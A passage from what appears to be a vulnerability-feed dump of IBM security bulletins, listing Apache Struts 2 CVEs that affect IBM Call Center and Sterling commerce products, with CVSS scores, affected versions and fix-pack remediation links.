system, caused by the passing of a malicious expression when Dynamic Method Invocation is enabled. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 5.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/112528](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112528>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2014-0113](<https://vulners.com/cve/CVE-2014-0113>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to CookieInterceptor and the failure to restrict access to the getClass() method. An attacker could exploit this vulnerability using CookieInterceptor when configured to accept all cookies to manipulate the ClassLoader used by the application server to execute arbitrary code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/92742](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92742>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2013-2135](<https://vulners.com/cve/CVE-2013-2135>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by double evaluation error when evaluating parameters as OGNL (Object-Graph Navigation Language) expressions. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to modify server-side objects and inject and execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84763](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84763>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2013-4316](<https://vulners.com/cve/CVE-2013-4316>) \n** DESCRIPTION: **An unspecified error in Apache Struts related to the default enabling of Dynamic Method Invocation (DMI) could lead to remote code execution. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/87373](<https://exchange.xforce.ibmcloud.com/vulnerabilities/87373>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n** CVEID: **[CVE-2012-0391](<https://vulners.com/cve/CVE-2012-0391>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary commands on the system, caused by the interpretation of parameter values as OGNL expressions by the ExceptionDelegator command. An attacker could exploit this vulnerability using a specially-crafted parameter to execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72229](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72229>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2012-0393](<https://vulners.com/cve/CVE-2012-0393>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to traverse directories on the system, caused by the improper validation of input by ParameterInterceptor prior to being used to create files. An attacker could send a specially-crafted URL request containing directory traversal sequences to create or overwrite arbitrary files on the system. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72089](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72089>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2012-4386](<https://vulners.com/cve/CVE-2012-4386>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site request forgery, caused by improper validation of the token name configuration parameter by the token handling mechanism. By persuading an authenticated user to visit a malicious Web site, a remote attacker could send a malformed HTTP request to perform unauthorized actions. An attacker could exploit this vulnerability to perform cross-site scripting attacks, Web cache poisoning, and other malicious activities. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/78182](<https://exchange.xforce.ibmcloud.com/vulnerabilities/78182>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2016-4003](<https://vulners.com/cve/CVE-2016-4003>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the URLDecoder implementation. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/111514](<https://exchange.xforce.ibmcloud.com/vulnerabilities/111514>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2016-3093](<https://vulners.com/cve/CVE-2016-3093>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by the improper implementation of cache used to store method references by the OGNL expression language. An attacker could exploit this vulnerability to block access to a Web site. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/113686](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113686>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2013-4310](<https://vulners.com/cve/CVE-2013-4310>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by an error in the action: parameter prefix. An attacker could exploit this vulnerability to gain unauthorized access to the system. \nCVSS Base score: 5.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/87336](<https://exchange.xforce.ibmcloud.com/vulnerabilities/87336>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:N) \n \n** CVEID: **[CVE-2014-0116](<https://vulners.com/cve/CVE-2014-0116>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by the failure to properly restrict access to the getClass() method by the CookieInterceptor class. An attacker could exploit this vulnerability to manipulate the ClassLoader used by the application server. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/93024](<https://exchange.xforce.ibmcloud.com/vulnerabilities/93024>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2010-1870](<https://vulners.com/cve/CVE-2010-1870>) \n** DESCRIPTION: **XWork, as used in Apache Struts, FishEye and Crucible, could allow a remote attacker to bypass security restrictions, caused by an error in the ParameterInterceptor class. An attacker could exploit this vulnerability using specially-crafted OGNL (Object-Graph Navigation Language) expressions to modify server-side objects and possibly execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/60371](<https://exchange.xforce.ibmcloud.com/vulnerabilities/60371>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2016-3082](<https://vulners.com/cve/CVE-2016-3082>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the use of XSLTResult to parse arbitrary stylesheet. An attacker could exploit this vulnerability to inject and execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/112527](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112527>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2016-4436](<https://vulners.com/cve/CVE-2016-4436>) \n** DESCRIPTION: **An unspecified error Apache Struts related to the method used to clean up action name has an unknown impact and attack vector. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/114183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114183>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2013-2251](<https://vulners.com/cve/CVE-2013-2251>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating the action:, redirect:, and redirectAction: parameters as OGNL (Object-Graph Navigation Language) expressions. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to inject and execute arbitrary commands on the system. Note: This vulnerability affects other products. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/85756](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85756>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2017-12611](<https://vulners.com/cve/CVE-2017-12611>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the use of an unintentional expression in Freemarker tag instead of string literals. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/131603](<https://exchange.xforce.ibmcloud.com/vulnerabilities/131603>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2015-5209](<https://vulners.com/cve/CVE-2015-5209>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to gain unauthorized access to the system. An attacker could exploit this vulnerability using a special top-level object to manipulate internal settings and modify another user session. \nCVSS Base score: 9.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/106695](<https://exchange.xforce.ibmcloud.com/vulnerabilities/106695>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N) \n \n** CVEID: **[CVE-2013-2115](<https://vulners.com/cve/CVE-2013-2115>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by an incomplete fix for an error related to the handling of the includeParams attribute. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to modify server-side objects and inject and execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84543](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84543>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2013-1966](<https://vulners.com/cve/CVE-2013-1966>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restriction, caused by the improper handling of the includeParams attribute. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to inject OGNL code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84542](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84542>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2013-2248](<https://vulners.com/cve/CVE-2013-2248>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to conduct phishing attacks, caused by an open redirect vulnerability in the DefaultActionMapper class. An attacker could exploit this vulnerability using the redirect: and redirectAction:: parameters in a specially-crafted URL to redirect a victim to arbitrary Web sites. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/85755](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85755>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2015-2992](<https://vulners.com/cve/CVE-2015-2992>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input when directly accessing JSP files. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/106172](<https://exchange.xforce.ibmcloud.com/vulnerabilities/106172>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2015-5169](<https://vulners.com/cve/CVE-2015-5169>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input when debug mode is enabled. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/105879](<https://exchange.xforce.ibmcloud.com/vulnerabilities/105879>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Call Center for Commerce| 9.5.0 \nIBM Call Center for Commerce| 10.0 \n \n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by upgrading to the latest fixpack that has the upgraded version of Apache Struts. Please note the fixpack only applies to IBM Call Center version 10 and if you are running IBM Call Center version 9.5 a product upgrade must be completed first. IBM Call Center version 9.5 reached end of support April 30, 2022.\n\nCall Center installing Fix Pack 12 - <https://www.ibm.com/docs/en/call-center/10.0?topic=center-installing-fix-packs>\n\nFix Pack 12 download location - [https://www.ibm.com/support/fixcentral/swg/selectFixes?fixids=10.0.0.0-Sterling-ISCCS-All-fp12-Installer&product=ibm%2FOther%20software%2FIBM%20Call%20Center%20for%20Commerce&source=dbluesearch&mhsrc=ibmsearch_a&mhq=10.0.0.0-Sterling&function=fixId&parent=ibm/Other%20software](<https://www.ibm.com/support/fixcentral/swg/selectFixes?fixids=10.0.0.0-Sterling-ISCCS-All-fp12-Installer&product=ibm%2FOther%20software%2FIBM%20Call%20Center%20for%20Commerce&source=dbluesearch&mhsrc=ibmsearch_a&mhq=10.0.0.0-Sterling&function=fixId&parent=ibm/Other%20software>)\n\nIBM Call Center release notes - <https://www.ibm.com/docs/en/call-center/10.0?topic=center-fixes-by-fix-pack-version#fp12>\n\nCreating & Extending Struts - <https://www.ibm.com/docs/en/order-management-sw/10.0?topic=cesf-creating-extending-struts-xml-file-in-web-ui-framework>\n\n## Workarounds and Mitigations\n\nBM strongly recommends addressing the vulnerability now by upgrading to the latest fixpack that has the upgraded version of Apache Struts. Please note the fixpack only applies to IBM Call Center version 10 and if you are running IBM Call Center version 9.5 a product upgrade must be completed first. IBM Call Center version 9.5 reached end of support April 30, 2022.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-14T17:37:56", "type": "ibm", "title": "Security Bulletin: IBM Call Center and Apache Struts Struts upgrade strategy (various CVEs, see below)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1870", "CVE-2011-1772", "CVE-2011-5057", "CVE-2012-0391", "CVE-2012-0392", "CVE-2012-0393", "CVE-2012-0838", "CVE-2012-1006", "CVE-2012-4386", "CVE-2012-4387", "CVE-2013-1965", "CVE-2013-1966", "CVE-2013-2115", "CVE-2013-2134", "CVE-2013-2135", "CVE-2013-2248", "CVE-2013-2251", "CVE-2013-4310", "CVE-2013-4316", "CVE-2014-0094", "CVE-2014-0112", "CVE-2014-0113", "CVE-2014-0116", "CVE-2014-7809", "CVE-2015-2992", "CVE-2015-5169", "CVE-2015-5209", "CVE-2016-3081", "CVE-2016-3082", "CVE-2016-3093", "CVE-2016-4003", "CVE-2016-4436", "CVE-2017-12611", "CVE-2019-0230", "CVE-2019-0233", "CVE-2020-17530"], "modified": "2022-09-14T17:37:56", "id": "43ABDDEF8A51FB28FC8C4825BAD26A0A25F5F21805BFC87561A0AEABFD065F37", "href": "https://www.ibm.com/support/pages/node/6620351", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-20T21:37:44", "description": "## Summary\n\nIBM Sterling Order Management and IBM Sterling Configure Price Quote use Apache Struts 2 and are affected by some of the vulnerabilities that exist in Apache Struts 2.\n\n## Vulnerability Details\n\nCVEID: [_CVE-2013-4310_](<https://vulners.com/cve/CVE-2013-4310>)\n\n**Description:** \n \nApache Struts 2.0.0 through 2.3.15.1 allows remote attackers to bypass access controls via a crafted action: prefix. \n \nCVSS Base Score: 5.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/87336_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/87336>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:N)\n\nCVEID: [_CVE-2013-4316_](<https://vulners.com/cve/CVE-2013-4316>)\n\n**DESCRIPTION: ** \n \nAn unspecified error in Apache Struts related to the default enabling of Dynamic Method Invocation (DMI) could lead to remote code execution.\n\nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/87373_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/87373>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\nCVEID: [_CVE-2013-2251_](<https://vulners.com/cve/CVE-2013-2251>)\n\n**Description:** \n \nApache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix. \n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/85756_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85756>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n_ \n_CVEID: [_CVE-2013-2248_](<https://vulners.com/cve/CVE-2013-2248>)\n\n**Description:** \n \nMultiple open redirect vulnerabilities in Apache Struts 2.0.0 through 2.3.15 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in a parameter using the (1) redirect: or (2) redirectAction: prefix.\n\nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/85755_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85755>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n_ \n_CVEID: [_CVE-2013-2135_](<https://vulners.com/cve/CVE-2013-2135>)\n\n**Description:** \n \nApache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted value that contains both \"${}\" and \"%{}\" sequences, which causes the OGNL code to be evaluated twice.\n\nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/84763_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84763>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n_ \n_CVEID: [_CVE-2013-2134_](<https://vulners.com/cve/CVE-2013-2134>)\n\n**Description:** \n \nApache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted action name that is not properly handled during wildcard matching, a different vulnerability than CVE-2013-2135. \n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/84762_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84762%20>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n_ \n_CVEID: [_CVE-2013-2115_](<https://vulners.com/cve/CVE-2013-2115>)\n\n**Description:** \n \nApache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag. NOTE: this issue is due to an incomplete fix for CVE-2013-1966.\n\n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/84543_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84543%20>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n_ \n_CVEID: [_CVE-2013-1966_](<https://vulners.com/cve/CVE-2013-1966>)\n\n**Description:** \n \nApache Struts 2 before 2.3.14.1 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag.\n\n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/84542_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84542>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n_ \n_CVEID: [_CVE-2013-1965_](<https://vulners.com/cve/CVE-2013-1965>) \n\n\n**Description:** \n \nApache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.1, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.\n\nCVSS Base Score: 6.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/85573_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85573>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:P)\n\n## Affected Products and Versions\n\nSterling Order Management 8.5 \nIBM Sterling Selling and Fulfillment Foundation 9.0 \nIBM Sterling Selling and Fulfillment Foundation 9.1.0 \nIBM Sterling Selling and Fulfillment Foundation 9.2.0 \nIBM Sterling Selling and Fulfillment Foundation 9.2.1 \nIBM Sterling Field Sales 9.0 \nIBM Sterling Field Sales 9.1.0 \nIBM Sterling Field Sales 9.2.0 \nIBM Sterling Field Sales 9.2.1\n\n## Remediation/Fixes\n\nThe recommended solution is to apply two fix packs sequentially, the security fix pack (SFP) and then followed by the fix pack (FP) as soon as practical. Please see below for information about the available fixes. \n \n \n\n\n**_Product_**| **_Security Fix Pack*_**| **_Fix Pack*_**| **_How to acquire fix_** \n---|---|---|--- \nIBM Sterling Selling and Fulfillment Foundation 9.2.1| **_9.2.1-SFP1_**| **_9.2.1-FP7_**| **_<http://www-933.ibm.com/support/fixcentral/options>_** \n \n**_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.2.0| **_9.2.0- SFP1_**| **_9.2.0-FP29_**| **_<http://www-933.ibm.com/support/fixcentral/options>_** \n \n**_Select appropriate VRMF _** \nIBM Sterling Selling and Fulfillment Foundation 9.1.0| **_9.1.0- SFP1_**| **_9.1.0-FP57_**| **_<http://www-933.ibm.com/support/fixcentral/options>_** \n \n**_Select appropriate VRMF _** \nIBM Sterling Selling and Fulfillment Foundation 9.0.0| **_9.0.0- SFP1_**| **_9.0.0-FP82_**| **_[https://www14.software.ibm.com/webapp/iwm/web/reg/signup.do?source=swg-SterlngLegacyreq&lang=en_US](<https://www14.software.ibm.com/webapp/iwm/web/reg/signup.do?source=swg-SterlngLegacyreq&lang=en_US>)_** \nSterling Order Management 8.5| **_8.5- SFP1_**| **_8.5-HF103_**| **_[https://www14.software.ibm.com/webapp/iwm/web/reg/signup.do?source=swg-SterlngLegacyreq&lang=en_US](<https://www14.software.ibm.com/webapp/iwm/web/reg/signup.do?source=swg-SterlngLegacyreq&lang=en_US>)_** \nIBM Sterling Field Sales 9.0| **_SFS9.0-SFP1_**| **_SFS9.0-HF6_**| **_[https://www14.software.ibm.com/webapp/iwm/web/reg/signup.do?source=swg-SterlngLegacyreq&lang=en_US](<https://www14.software.ibm.com/webapp/iwm/web/reg/signup.do?source=swg-SterlngLegacyreq&lang=en_US>)_** \nIBM Sterling Field Sales 9.1.0| **_SFS9.1.0-_** **_SFP1_**| **_SFS9.1.0-FP15_**| **_<http://www-933.ibm.com/support/fixcentral/options>_** \n \n**_Select appropriate VRMF_** \nIBM Sterling Field Sales 9.2.0| **_SFS9.2.0- SFP1_**| **_SFS9.2.0-FP4_**| **_<http://www-933.ibm.com/support/fixcentral/options>_** \n \n**_Select appropriate VRMF_** \nIBM Sterling Field Sales 9.2.1| **_SFS9.2.1- SFP1_**| **_SFS9.2.1-FP2_**| **_<http://www-933.ibm.com/support/fixcentral/options>_** \n \n**_Select appropriate VRMF_** \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T19:34:59", "type": "ibm", "title": "Security Bulletin: IBM Sterling Order Management and IBM Sterling Configure, Price, Quote are affected by multiple Apache Struts 2 security vulnerabilities.", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1965", "CVE-2013-1966", "CVE-2013-2115", "CVE-2013-2134", "CVE-2013-2135", "CVE-2013-2248", "CVE-2013-2251", "CVE-2013-4310", "CVE-2013-4316"], "modified": "2018-06-16T19:34:59", "id": "D68D8E96CFEEA20788D774DC41555B0BE3390F1E2DFCA1C7093ABC2ACCB666A8", "href": "https://www.ibm.com/support/pages/node/237901", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T05:52:59", "description": "## Summary\n\nIBM Sterling Web Channel use Apache Struts 2 and is affected by some of the vulnerabilities that exist in Apache Struts 2.\n\n## Vulnerability Details\n\nCVEID: [_CVE-2013-4310_](<https://vulners.com/cve/CVE-2013-4310>)\n\n**Description:** \nApache Struts could allow a remote attacker to bypass security restrictions, caused by an error in the action: parameter prefix. An attacker could exploit this vulnerability to gain unauthorized access to the system. \n \nCVSS Base Score: 5.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/87336_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/87336>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:N) \n\nCVEID: [_CVE-2013-4316_](<https://vulners.com/cve/CVE-2013-4316>)\n\n**Description:** \nAn unspecified error in Apache Struts related to the default enabling of Dynamic Method Invocation (DMI) could lead to remote code execution. \n\nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/87373_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/87373>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: 